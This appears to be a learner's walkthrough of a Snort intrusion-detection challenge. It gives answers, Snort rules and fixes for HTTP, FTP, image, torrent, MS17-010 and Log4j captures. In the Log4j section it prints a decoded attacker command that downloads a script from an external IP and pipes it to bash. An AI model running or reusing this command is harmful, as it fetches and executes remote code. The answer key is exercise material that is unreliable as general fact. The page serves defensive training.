SOC LEVEL 1
  • Path 1
    • Cyber Defense Framework
      • Security Analyst Intro
      • Pyramid of Pain
      • Cyber Kill Chain
      • Unified Kill Chain
      • Diamond Model
      • MITRE
  • PATH 2
    • Cyber Threat Intelligence
      • Intro to Cyber Threat Intel
      • Threat Intelligence Tools
      • Yara
      • OpenCTI
      • MISP
  • PATH 3
    • Network Security and Traffic Analysis
      • Traffic Analysis Essentials
      • Snort
      • Snort Challenge - The Basics
      • Snort Challenge - Live Attacks
      • NetworkMiner
      • Zeek
      • Zeek Exercises
      • Brim
      • Wireshark: The Basics
      • Wireshark: Packet Operations
      • Wireshark: Traffic Analysis
  • PATH 4
    • Endpoint Security Monitoring
      • Intro to Endpoint Security
      • Core Windows Processes
      • Sysinternals
      • Windows Event Logs
      • Sysmon
      • Osquery: The basics
      • Wazuh
  • PATH 5
    • Security Information and Event Management
      • Introduction to SIEM
      • Investigating with ELK 101
      • ItsyBitsy
      • Splunk: Basics
      • Incident Handling with Splunk
      • Investigating with Splunk
      • Benign
  • PATH 6
    • Digital Forensics and Incident Response
      • DFIR: An Introduction
      • Windows Forensics 1
      • Windows Forensics 2
      • Linux Forensics
      • Autopsy
      • Redline
      • Kape
      • Volatility
      • Velociraptor
      • TheHive Project
      • Intro to Malware Analysis
  • PATH 7
    • Phishing
      • Phishing Analysis Fundamentals
      • Phishing Emails in Action
      • Phishing Analysis Tools
      • Phishing Prevention
      • The Greenholt Phish
Powered by GitBook
On this page
  • Writing IDS Rules (HTTP)
  • Writing IDS Rules (FTP)
  • Writing IDS Rules (PNG)
  • Writing IDS Rules (Torrent Metafile)
  • Troubleshooting Rule Syntax Errors
  • Using External Rules (MS17-010)
  • Using External Rules (Log4j)
  1. PATH 3
  2. Network Security and Traffic Analysis

Snort Challenge - The Basics

Put snort skills into practice and write snort rules to analyze live capture network traffic.

PreviousSnortNextSnort Challenge - Live Attacks

Last updated 2 years ago

Writing IDS Rules (HTTP)

Write rules to detect "all TCP port 80 traffic" packets in the given pcap file.

Setting the alerts to be directional, will add packets for inbound and outbound traffic.

What is the number of detected packets?

328

What is the destination address of packet 63?

What is the ACK number of packet 64?

0x38AFFFF3

What is the SEQ number of packet 62?

0x38AFFFF3

What is the TTL of packet 65?

128

What is the source IP of packet 65?

145.254.160.237

What is the source port of packet 65?

3372

Writing IDS Rules (FTP)

Write rules to detect "all TCP port 21" traffic in the given pcap.

What is the number of detected packets?

614

What is the FTP service name?

Microsoft FTP Service

Write a rule to detect failed FTP login attempts in the given pcap.

What is the number of detected packets?

41

Write a rule to detect successful FTP logins in the given pcap.

What is the number of detected packets?

1

Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.

What is the number of detected packets?

42

Write a rule to detect failed FTP login attempts with "Administrator" username but a bad password or no password.

What is the number of detected packets?

7

Writing IDS Rules (PNG)

Write a rule to detect the PNG file in the given pcap.

Investigate the logs and identify the software name embedded in the packet.

Write a rule to detect the GIF file in the given pcap.

Investigate the logs and identify the image format embedded in the packet.

Writing IDS Rules (Torrent Metafile)

Write a rule to detect the torrent metafile in the given pcap.

What is the number of detected packets?

2

Investigate the log/alarm files.

What is the name of the torrent application?

What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

application/x-bittorrent

What is the hostname of the torrent metafile?

Troubleshooting Rule Syntax Errors

Fix the syntax errors in the given rule files.

Test each ruleset with the following command structure;

sudo snort -c local-X.rules -r mx-1.pcap -A console

Fix the syntax error in local-1.rules file and make it work smoothly.

What is the number of the detected packets?

16

After changing the command to: sudo snort -c local-1.rules -dev -l . -r mx-1.pcacp -A console the snort rule ran successfully

Fix the syntax error in local-2.rules file and make it work smoothly.

What is the number of the detected packets?

68

Fix the syntax error in local-3.rules file and make it work smoothly.

What is the number of the detected packets?

87

Fix the syntax error in local-4.rules file and make it work smoothly.

What is the number of the detected packets?

90

Fix the syntax error in local-5.rules file and make it work smoothly.

What is the number of the detected packets?

155

Fix the logical error in local-6.rules file and make it work smoothly to create alerts.

What is the number of the detected packets?

2

Fix the logical error in local-7.rules file and make it work smoothly to create alerts.

What is the name of the required option?

msg

Using External Rules (MS17-010)

Use the given rule file (local.rules) to investigate the ms1710 exploitation.

What is the number of detected packets?

25154

Use local-1.rules empty file to write a new rule to detect payloads containing the "\IPC$" keyword.

What is the number of detected packets?

12

Investigate the log/alarm files.

What is the requested path?

\\192.168.116.138\IPC

What is the CVSS v2 score of the MS17-010 vulnerability?

Using External Rules (Log4j)

Use the given rule file (local.rules) to investigate the log4j exploitation.

What is the number of detected packets?

26

Investigate the log/alarm files.

How many rules were triggered?

4

Since all of the triggered alerts have the content of 210037xx, using grep to catch this pattern and combining the duplicated lines will provide the answer of 4 rules that were triggered.

Investigate the log/alarm files.

What are the first six digits of the triggered rule sids?

210037

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes.

What is the number of detected packets?

41

Investigate the log/alarm files.

What is the name of the used encoding algorithm?

Base64

Investigate the log/alarm files.

What is the IP ID of the corresponding packet?

62808

Investigate the log/alarm files.

Decode the encoded command.

What is the attacker's command?

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

What is the CVSS v2 score of the Log4j vulnerability?

9.3

Command to create snort log using local rules
328
Command to analyze up to packet 63
145.254.160.237
Command to analyze up to packet 64
0x38AFFFF3
Command to analyze up to packet 62
0x38AFFFF3
Command to analyze up to packet 65
128
145.254.160.237
3372
FTP ALERTS
Command to create Snort log
614
grepping for FTP return code "Service Ready"
41
1
42
alert tcp any any <> any 21 (msg: "Failed Admin Login Attempt"; content:"Administrator"; content:"331 Password"; sid: 100005; rev: 1;)
List PNG file signature for content
Adobe Image Ready
List GIF file signature for content
GIF98a
bittorrent
tracker2.torrentbox.com
any(msg:
any (msg:
sid: 1000001
16
Port value missing
68
GID SID in rule duplicates
87
Unmatch quote in rule option 'msg'
90
Illegal direction specifier
155
Change the direction to -> and the content in the rule to GET
2
alert does not have a msg set
25154
Bad escape sequence
removed \ in conent
\\192.168.116.138\IPC
26
4
sudo snort -X -r snort.log.1681926058
https://www.tenable.com/plugins/nessus/97737
https://nvd.nist.gov/vuln/detail/CVE-2021-44228